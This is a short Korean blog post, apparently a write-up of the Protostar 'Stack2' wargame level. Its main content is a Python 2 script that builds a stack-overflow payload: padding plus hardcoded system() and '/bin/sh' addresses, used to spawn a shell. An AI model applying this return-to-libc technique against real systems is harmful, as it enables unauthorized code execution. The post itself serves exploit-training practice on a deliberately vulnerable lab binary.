이번에는 환경변수로 입력 받은 값을 buffer에 집어넣어주네요.
넣어줍시다.
대신, 0x0a, 0x0d의 경우 개행을 나타내는 hex value이기 때문에 double quotation으로 한번 더 묶어줍시다.
#coding: utf-8 from struct import pack, unpack p = lambda x: pack("<L", x) up = lambda x: unpack("<L",x)[0] system = 0xb7ecffb0 binsh = 0xb7fb63bf payload = 'A'*84 payload += p(system) payload += 'AAAA' payload += p(binsh) print payload
stack2.py
쉘도 따줍시다.
'Wargame > Protostar:Exploit-Exercises' 카테고리의 다른 글
[Protostar : Exploit-Exercises] Stack5 (0) | 2016.09.24 |
---|---|
[Protostar : Exploit-Exercises] Stack4 (0) | 2016.09.24 |
[Protostar : Exploit-Exercises] Stack3 (0) | 2016.09.24 |
[Protostar : Exploit-Exercises] Stack1 (0) | 2016.09.24 |
[Protostar : Exploit-Exercises] Stack0 (0) | 2016.09.24 |